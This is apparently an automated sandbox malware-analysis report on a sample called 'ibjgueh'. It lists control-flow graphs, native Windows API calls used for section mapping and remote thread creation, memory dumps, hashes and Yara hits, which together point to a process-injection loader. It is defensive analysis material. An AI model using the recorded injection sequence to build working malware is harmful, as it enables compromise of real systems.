                                control_flow_graph 151 401514-401533 153 401524-40152f 151->153 154 401536-40156e call 401193 151->154 153->154 163 401570 154->163 164 401573-401578 154->164 163->164 166 401898-4018a0 164->166 167 40157e-40158f 164->167 166->164 170 401595-4015be 167->170 171 401896-4018a5 167->171 170->171 181 4015c4-4015db NtDuplicateObject 170->181 173 4018b4 171->173 174 4018ab-4018b0 171->174 173->174 176 4018b7 173->176 174->176 177 4018c5 176->177 178 4018bc-4018e3 call 401193 176->178 177->178 181->171 182 4015e1-401605 NtCreateSection 181->182 185 401661-401687 NtCreateSection 182->185 186 401607-401628 NtMapViewOfSection 182->186 185->171 188 40168d-401691 185->188 186->185 187 40162a-401646 NtMapViewOfSection 186->187 187->185 191 401648-40165e 187->191 188->171 192 401697-4016b8 NtMapViewOfSection 188->192 191->185 192->171 194 4016be-4016da NtMapViewOfSection 192->194 194->171 196 4016e0 call 4016e5 194->196
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 198 4014fe-401503 199 401531-40156e call 401193 198->199 200 401506-401511 198->200 210 401570 199->210 211 401573-401578 199->211 210->211 213 401898-4018a0 211->213 214 40157e-40158f 211->214 213->211 217 401595-4015be 214->217 218 401896-4018a5 214->218 217->218 228 4015c4-4015db NtDuplicateObject 217->228 220 4018b4 218->220 221 4018ab-4018b0 218->221 220->221 223 4018b7 220->223 221->223 224 4018c5 223->224 225 4018bc-4018e3 call 401193 223->225 224->225 228->218 229 4015e1-401605 NtCreateSection 228->229 232 401661-401687 NtCreateSection 229->232 233 401607-401628 NtMapViewOfSection 229->233 232->218 235 40168d-401691 232->235 233->232 234 40162a-401646 NtMapViewOfSection 233->234 234->232 238 401648-40165e 234->238 235->218 239 401697-4016b8 NtMapViewOfSection 235->239 238->232 239->218 241 4016be-4016da NtMapViewOfSection 239->241 241->218 243 4016e0 call 4016e5 241->243
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectView
                                • String ID:
                                • API String ID: 1652636561-0
                                • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 245 401542-40156e call 401193 254 401570 245->254 255 401573-401578 245->255 254->255 257 401898-4018a0 255->257 258 40157e-40158f 255->258 257->255 261 401595-4015be 258->261 262 401896-4018a5 258->262 261->262 272 4015c4-4015db NtDuplicateObject 261->272 264 4018b4 262->264 265 4018ab-4018b0 262->265 264->265 267 4018b7 264->267 265->267 268 4018c5 267->268 269 4018bc-4018e3 call 401193 267->269 268->269 272->262 273 4015e1-401605 NtCreateSection 272->273 276 401661-401687 NtCreateSection 273->276 277 401607-401628 NtMapViewOfSection 273->277 276->262 279 40168d-401691 276->279 277->276 278 40162a-401646 NtMapViewOfSection 277->278 278->276 282 401648-40165e 278->282 279->262 283 401697-4016b8 NtMapViewOfSection 279->283 282->276 283->262 285 4016be-4016da NtMapViewOfSection 283->285 285->262 287 4016e0 call 4016e5 285->287
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 289 401549-40156e call 401193 293 401570 289->293 294 401573-401578 289->294 293->294 296 401898-4018a0 294->296 297 40157e-40158f 294->297 296->294 300 401595-4015be 297->300 301 401896-4018a5 297->301 300->301 311 4015c4-4015db NtDuplicateObject 300->311 303 4018b4 301->303 304 4018ab-4018b0 301->304 303->304 306 4018b7 303->306 304->306 307 4018c5 306->307 308 4018bc-4018e3 call 401193 306->308 307->308 311->301 312 4015e1-401605 NtCreateSection 311->312 315 401661-401687 NtCreateSection 312->315 316 401607-401628 NtMapViewOfSection 312->316 315->301 318 40168d-401691 315->318 316->315 317 40162a-401646 NtMapViewOfSection 316->317 317->315 321 401648-40165e 317->321 318->301 322 401697-4016b8 NtMapViewOfSection 318->322 321->315 322->301 324 4016be-4016da NtMapViewOfSection 322->324 324->301 326 4016e0 call 4016e5 324->326
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 328 401557 329 40155b-40156e call 401193 328->329 330 40154f-401554 328->330 333 401570 329->333 334 401573-401578 329->334 330->329 333->334 336 401898-4018a0 334->336 337 40157e-40158f 334->337 336->334 340 401595-4015be 337->340 341 401896-4018a5 337->341 340->341 351 4015c4-4015db NtDuplicateObject 340->351 343 4018b4 341->343 344 4018ab-4018b0 341->344 343->344 346 4018b7 343->346 344->346 347 4018c5 346->347 348 4018bc-4018e3 call 401193 346->348 347->348 351->341 352 4015e1-401605 NtCreateSection 351->352 355 401661-401687 NtCreateSection 352->355 356 401607-401628 NtMapViewOfSection 352->356 355->341 358 40168d-401691 355->358 356->355 357 40162a-401646 NtMapViewOfSection 356->357 357->355 361 401648-40165e 357->361 358->341 362 401697-4016b8 NtMapViewOfSection 358->362 361->355 362->341 364 4016be-4016da NtMapViewOfSection 362->364 364->341 366 4016e0 call 4016e5 364->366
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 369 402f97-402fbb 370 402fc1-402fd9 369->370 371 4030ee-4030f3 369->371 370->371 372 402fdf-402ff0 370->372 373 402ff2-402ffb 372->373 374 403000-40300e 373->374 374->374 375 403010-403017 374->375 376 403039-403040 375->376 377 403019-403038 375->377 378 403062-403065 376->378 379 403042-403061 376->379 377->376 380 403067-40306a 378->380 381 40306e 378->381 379->378 380->381 382 40306c 380->382 381->373 383 403070-403075 381->383 382->383 383->371 384 403077-40307a 383->384 384->371 385 40307c-4030eb RtlCreateUserThread NtTerminateProcess 384->385 385->371
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: CreateProcessTerminateThreadUser
                                • String ID:
                                • API String ID: 1921587553-0
                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 66 2cc003c-2cc0047 67 2cc004c-2cc0263 call 2cc0a3f call 2cc0e0f call 2cc0d90 VirtualAlloc 66->67 68 2cc0049 66->68 83 2cc028b-2cc0292 67->83 84 2cc0265-2cc0289 call 2cc0a69 67->84 68->67 86 2cc02a1-2cc02b0 83->86 88 2cc02ce-2cc03c2 VirtualProtect call 2cc0cce call 2cc0ce7 84->88 86->88 89 2cc02b2-2cc02cc 86->89 95 2cc03d1-2cc03e0 88->95 89->86 96 2cc0439-2cc04b8 VirtualFree 95->96 97 2cc03e2-2cc0437 call 2cc0ce7 95->97 99 2cc04be-2cc04cd 96->99 100 2cc05f4-2cc05fe 96->100 97->95 102 2cc04d3-2cc04dd 99->102 103 2cc077f-2cc0789 100->103 104 2cc0604-2cc060d 100->104 102->100 106 2cc04e3-2cc0505 102->106 107 2cc078b-2cc07a3 103->107 108 2cc07a6-2cc07b0 103->108 104->103 109 2cc0613-2cc0637 104->109 120 2cc0517-2cc0520 106->120 121 2cc0507-2cc0515 106->121 107->108 111 2cc086e-2cc08be LoadLibraryA 108->111 112 2cc07b6-2cc07cb 108->112 110 2cc063e-2cc0648 109->110 110->103 113 2cc064e-2cc065a 110->113 119 2cc08c7-2cc08f9 111->119 115 2cc07d2-2cc07d5 112->115 113->103 118 2cc0660-2cc066a 113->118 116 2cc0824-2cc0833 115->116 117 2cc07d7-2cc07e0 115->117 126 2cc0839-2cc083c 116->126 123 2cc07e4-2cc0822 117->123 124 2cc07e2 117->124 125 2cc067a-2cc0689 118->125 127 2cc08fb-2cc0901 119->127 128 2cc0902-2cc091d 119->128 122 2cc0526-2cc0547 120->122 121->122 129 2cc054d-2cc0550 122->129 123->115 124->116 130 2cc068f-2cc06b2 125->130 131 2cc0750-2cc077a 125->131 126->111 132 2cc083e-2cc0847 126->132 127->128 133 2cc0556-2cc056b 129->133 134 2cc05e0-2cc05ef 129->134 135 2cc06ef-2cc06fc 130->135 136 2cc06b4-2cc06ed 130->136 131->110 137 2cc0849 132->137 138 2cc084b-2cc086c 132->138 140 2cc056d 133->140 141 2cc056f-2cc057a 133->141 134->102 142 2cc06fe-2cc0748 135->142 143 2cc074b 135->143 136->135 137->111 138->126 140->134 144 2cc057c-2cc0599 141->144 145 2cc059b-2cc05bb 141->145 142->143 143->125 150 2cc05bd-2cc05db 144->150 145->150 150->129
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CC024D
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2cc0000_ibjgueh.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: cess$kernel32.dll
                                • API String ID: 4275171209-1230238691
                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                • Instruction ID: eb4fb2c8579feb1d98d09637ed203926217431dc0c01c4b43d6d7397d26ae795
                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                • Instruction Fuzzy Hash: 83526974A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 368 415820-415960 GetModuleHandleW GetProcAddress VirtualProtect
                                APIs
                                • GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158FF
                                • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 0041593C
                                • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041595B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-3916222277
                                • Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                • Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
                                • Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                • Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 386 2d0aa0f-2d0aa28 387 2d0aa2a-2d0aa2c 386->387 388 2d0aa33-2d0aa3f CreateToolhelp32Snapshot 387->388 389 2d0aa2e 387->389 390 2d0aa41-2d0aa47 388->390 391 2d0aa4f-2d0aa5c Module32First 388->391 389->388 390->391 396 2d0aa49-2d0aa4d 390->396 392 2d0aa65-2d0aa6d 391->392 393 2d0aa5e-2d0aa5f call 2d0a6ce 391->393 397 2d0aa64 393->397 396->387 396->391 397->392
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D0AA37
                                • Module32First.KERNEL32(00000000,00000224), ref: 02D0AA57
                                Memory Dump Source
                                • Source File: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D07000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2d07000_ibjgueh.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:
                                • API String ID: 3833638111-0
                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction ID: 2158e3f5a6ce4604574b55cb3f293181632023f1942b7de7927921e47012880b
                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction Fuzzy Hash: 21F090326007116FD7207BFAA9CDB6EB6E8AF49724F101528F742922D0EB70ED458A61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 399 2cc0e0f-2cc0e24 SetErrorMode * 2 400 2cc0e2b-2cc0e2c 399->400 401 2cc0e26 399->401 401->400
                                APIs
                                • SetErrorMode.KERNELBASE(00000400,?,?,02CC0223,?,?), ref: 02CC0E19
                                • SetErrorMode.KERNELBASE(00000000,?,?,02CC0223,?,?), ref: 02CC0E1E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2cc0000_ibjgueh.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                • Instruction ID: 59145803a341f42eb765d6959b20131ad0ef228589562980b91258829723d85c
                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                • Instruction Fuzzy Hash: 72D01231145128B7D7003A94DC09BCD7B1CDF05B66F108011FB0DD9080C770964046E5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 402 4018e6-40194b call 401193 Sleep call 40141f 416 40195a-4019a5 call 401193 402->416 417 40194d-401955 call 401514 402->417 417->416
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 431 401915-401918 432 4018c6-4018c7 431->432 433 40191a-40194b call 401193 Sleep call 40141f 431->433 434 4018d7 432->434 435 4018ce-4018e3 call 401193 432->435 445 40195a-4019a5 call 401193 433->445 446 40194d-401955 call 401514 433->446 434->435 446->445
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 460 4018f1-40194b call 401193 Sleep call 40141f 470 40195a-4019a5 call 401193 460->470 471 40194d-401955 call 401514 460->471 471->470
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 485 401912-40194b call 401193 Sleep call 40141f 496 40195a-4019a5 call 401193 485->496 497 40194d-401955 call 401514 485->497 497->496
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D0A71F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D07000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2d07000_ibjgueh.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction ID: e8068d03151aef2c62727455b33883587b83a8a1733a9c685cffc8b139f8f3f1
                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction Fuzzy Hash: 19112B79A00208EFDB01DF98C985E98BBF5EF08350F158094FA489B362D771EA50DF90
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                APIs
